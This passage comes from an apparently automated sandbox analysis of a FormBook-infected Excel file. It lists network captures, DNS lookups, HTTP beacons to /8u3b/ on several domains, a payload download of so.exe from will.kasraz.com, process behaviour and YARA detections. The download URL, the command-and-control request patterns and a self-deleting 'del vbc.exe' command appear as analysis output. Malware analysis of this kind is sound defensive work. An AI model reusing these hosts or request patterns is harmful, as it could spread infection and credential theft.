                                                                                                                                                              May 4, 2021 16:58:51.720041990 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720052958 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720066071 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720073938 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720088005 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720098972 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720114946 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720118999 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720140934 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720150948 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720166922 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720175028 CEST4916780192.168.2.22192.3.122.177
                                                                                                                                                              May 4, 2021 16:58:51.720191956 CEST8049167192.3.122.177192.168.2.22
                                                                                                                                                              May 4, 2021 16:58:51.720201015 CEST4916780192.168.2.22192.3.122.177

                                                                                                                                                              UDP Packets


                                                                                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 4, 2021 16:58:50.262860060 CEST | 192.168.2.22 | 8.8.8.8 | 0xa8c1 | Standard query (0) | will.kasraz.com | A (IP address) | IN (0x0001)
May 4, 2021 16:59:57.998733044 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.donelys.com | A (IP address) | IN (0x0001)
May 4, 2021 17:00:03.454328060 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.discjockeydelraybeach.com | A (IP address) | IN (0x0001)
May 4, 2021 17:00:09.324558973 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.arfjkacsgatfzbazpdth.com | A (IP address) | IN (0x0001)
May 4, 2021 17:00:15.242461920 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.girlboyfriends.com | A (IP address) | IN (0x0001)
May 4, 2021 17:00:20.680871010 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.burundiacademyst.com | A (IP address) | IN (0x0001)
May 4, 2021 17:00:26.246644020 CEST | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.pipienta.com | A (IP address) | IN (0x0001)

                                                                                                                                                              DNS Answers


                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • will.kasraz.com
                                                                                                                                                              • www.donelys.com
                                                                                                                                                              • www.discjockeydelraybeach.com
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com
                                                                                                                                                              • www.girlboyfriends.com
                                                                                                                                                              • www.burundiacademyst.com
                                                                                                                                                              • www.pipienta.com

                                                                                                                                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 192.3.122.177 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
May 4, 2021 16:58:50.469680071 CEST | 0 | OUT | GET /a/so.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: will.kasraz.com
Connection: Keep-Alive
May 4, 2021 16:58:50.608273983 CEST | 2 | IN | HTTP/1.1 200 OK
Date: Tue, 04 May 2021 14:58:50 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
Last-Modified: Tue, 04 May 2021 10:00:54 GMT
ETag: "a2800-5c17e27600d6b"
Accept-Ranges: bytes
Content-Length: 665600
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49169 | 198.54.117.210 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 4, 2021 16:59:58.265768051 CEST | 702 | OUT | GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1
Host: www.donelys.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49170 | Destination IP: 108.177.174.182 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 4, 2021 17:00:04.009607077 CEST | kBytes transferred: 703 | Direction: OUT
GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.discjockeydelraybeach.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
Timestamp: May 4, 2021 17:00:04.202766895 CEST | kBytes transferred: 703 | Direction: IN
HTTP/1.1 200 OK
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                              X-Powered-By: Nginx
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:01 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                                              Data Ascii: 3
Timestamp: May 4, 2021 17:00:04.202800989 CEST | kBytes transferred: 705 | Direction: IN
                                                                                                                                                              Data Ascii: 1072<!DOCTYPE html><html><head> <title>...</title> <meta charset=UTF-8 /> <meta http-equiv=Cache-Control content=no-siteapp /> <meta http-equiv=Cache-Control content=no-transform /> <meta name=applicab
Timestamp: May 4, 2021 17:00:04.202812910 CEST | kBytes transferred: 706 | Direction: IN
                                                                                                                                                              Data Ascii: acing:2px}.alert-btn:hover{background-color:#ff5656}.alert-footer{margin:0 auto;height:42px;text-align:center;width:100%;margin-bottom:10px}.alert-footer-icon{float:left}.alert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0
Timestamp: May 4, 2021 17:00:04.202828884 CEST | kBytes transferred: 708 | Direction: IN
                                                                                                                                                              Data Ascii: var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script> var _hmt = _hmt || []; (function () { var hm = document.createElement("scrip
Timestamp: May 4, 2021 17:00:04.202841043 CEST | kBytes transferred: 708 | Direction: IN
                                                                                                                                                              Data Ascii: ad").innerHTML = str1; btn.innerHTML = btnText; </script> <script> var _0x1064=['/panel','ype','indexO','//chen','split','parent','88.com','src','251XxkTNr','jia.ch','2416tOolcC'


Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 103.5.116.132 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 4, 2021 17:00:09.929189920 CEST | kBytes transferred: 708 | Direction: OUT
GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1
                                                                                                                                                              Host: www.arfjkacsgatfzbazpdth.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
Timestamp: May 4, 2021 17:00:10.211775064 CEST | kBytes transferred: 709 | Direction: IN
HTTP/1.1 302 Found
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:10 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Location: http://choco.mhnebsadebugpctkuryt.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A==
                                                                                                                                                              Content-Length: 333
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://choco.mhnebsadebugpctkuryt.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&amp;hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A==">here</a>.</p></body></html>


Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49172 | Destination IP: 54.156.162.121 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 4, 2021 17:00:15.537406921 CEST | kBytes transferred: 710 | Direction: OUT
GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.girlboyfriends.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
Timestamp: May 4, 2021 17:00:15.678083897 CEST | kBytes transferred: 712 | Direction: IN
HTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Ascii: 14c8<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden
Timestamp: May 4, 2021 17:00:15.678112984 CEST | kBytes transferred: 713 | Direction: IN
                                                                                                                                                              Data Ascii: } #logo { background: url(https://www.namebrightstatic.com/images/logo_off.gif) no-repeat; width: 225px; height: 57px; margin-left: 29px; float: left;
Timestamp: May 4, 2021 17:00:15.678128004 CEST | kBytes transferred: 714 | Direction: IN
                                                                                                                                                              Data Ascii: al 16px Arial, Helvetica, sans-serif !important; color: #fff; } .siteMaintenance p a { color: #FFF; } </style></head><body> <div class="sk
Timestamp: May 4, 2021 17:00:15.678139925 CEST | kBytes transferred: 716 | Direction: IN
                                                                                                                                                              Data Ascii: d"> <div class="siteMaintenance" style="font-family:Tahoma"> <h1>girlboyfriends.com<br /> is coming soon</h1> </div>
Timestamp: May 4, 2021 17:00:15.678153992 CEST | kBytes transferred: 716 | Direction: IN
                                                                                                                                                              Data Ascii: nter"> </a> </div></noscript>... End of StatCounter Code for Default Guide --></body></html>
Timestamp: May 4, 2021 17:00:15.678167105 CEST | kBytes transferred: 716 | Direction: IN
                                                                                                                                                              Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.22 | Source Port: 49173 | Destination IP: 66.235.200.147 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 4, 2021 17:00:20.875209093 CEST | kBytes transferred: 717 | Direction: OUT
GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1
                                                                                                                                                              Host: www.burundiacademyst.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
Timestamp: May 4, 2021 17:00:21.241594076 CEST | kBytes transferred: 718 | Direction: IN
HTTP/1.1 404 Not Found
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=Lax
                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                              cf-request-id: 09d97e072e00004e44b212b000000001
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 64a2991eb90d4e44-FRA
                                                                                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Timestamp: May 4, 2021 17:00:21.241620064 CEST | kBytes transferred: 718 | Direction: IN
                                                                                                                                                              Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.22 | Source Port: 49174 | Destination IP: 157.7.107.165 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: May 4, 2021 17:00:27.158471107 CEST | kBytes transferred: 718 | Direction: OUT
GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.pipienta.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
Timestamp: May 4, 2021 17:00:29.320266962 CEST | kBytes transferred: 719 | Direction: IN
HTTP/1.1 301 Moved Permanently
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: Apache
                                                                                                                                                              X-Powered-By: PHP/7.4.12
                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                              Location: https://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20
                                                                                                                                                              X-Cache: MISS


                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Memory Usage

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Behavior

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Start time:16:58:47
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x13fde0000
                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:08
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:543304 bytes
                                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:11
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              • Detection: 13%, ReversingLabs
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:14
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:15
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:16
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:21
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:
                                                                                                                                                              Imagebase:0xffca0000
                                                                                                                                                              File size:3229696 bytes
                                                                                                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:46
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                              Imagebase:0x310000
                                                                                                                                                              File size:279552 bytes
                                                                                                                                                              MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:47
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x4a6d0000
                                                                                                                                                              File size:302592 bytes
                                                                                                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis


                                                                                                                                                                Executed Functions

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7e96604cf433086713abe3061519f1c368c010a63e22d487caddbab5798ef88e
                                                                                                                                                                • Instruction ID: be8f9b85f2a8661b2e63e6ab6a8c22d5a4c053f2a98512181f698796839ba049
                                                                                                                                                                • Opcode Fuzzy Hash: 7e96604cf433086713abe3061519f1c368c010a63e22d487caddbab5798ef88e
                                                                                                                                                                • Instruction Fuzzy Hash: 7FD2D534A41618CFC7A4DF24C898AD9B7B1FF89704F5186E9E509AB361DB31AE81CF41
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d8054b97e6116fecbc5c9d3b06cf762d35346a598ab995a374798a52204d9f61
                                                                                                                                                                • Instruction ID: a6b88895bc3c04d8b472956abfa7dd0a0ecf05a8c553c11c494c01b8fb1d5b08
                                                                                                                                                                • Opcode Fuzzy Hash: d8054b97e6116fecbc5c9d3b06cf762d35346a598ab995a374798a52204d9f61
                                                                                                                                                                • Instruction Fuzzy Hash: 07E10934A10208CFC714DFB4C994A9DB7B2FF8A304F6185AAE506AB365DB74AD85CF41
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: e21d3c981265a1aeca47da21dbe7806a1b42d704e6127da4b1b86c0fe9bfaafe
                                                                                                                                                                • Instruction ID: dec1ed926e5dd45f67e05e66cd8fe484772f14590fcc17490e0429950ea36c97
                                                                                                                                                                • Opcode Fuzzy Hash: e21d3c981265a1aeca47da21dbe7806a1b42d704e6127da4b1b86c0fe9bfaafe
                                                                                                                                                                • Instruction Fuzzy Hash: 6DE1F634A10208CFC714DFB4C994AADB7B2FF89304F6185A9E506AB365DB74AD85CF41
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 12ccbbedac890b22ea5a0b2d57c003de68d5b544959362b3e10296e1ec4e5750
                                                                                                                                                                • Instruction ID: ccdd4df2b87a7010794b088343c11d893ebcf1bbd5b8be2c12ac5abac76ea7ad
                                                                                                                                                                • Opcode Fuzzy Hash: 12ccbbedac890b22ea5a0b2d57c003de68d5b544959362b3e10296e1ec4e5750
                                                                                                                                                                • Instruction Fuzzy Hash: CA514C70E052499FDB08CFAAD8446AEFBF2BF8D300F24C56AD509B7265D7385A41CB64
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: ef90d33983af79fb6387e4f83dd2afea82604c089685792a6885ad3a17f7305c
                                                                                                                                                                • Instruction ID: 17773657cc27317d7800697339ffcbc10ca5c5181bb2d7052a682e6ec2dc2878
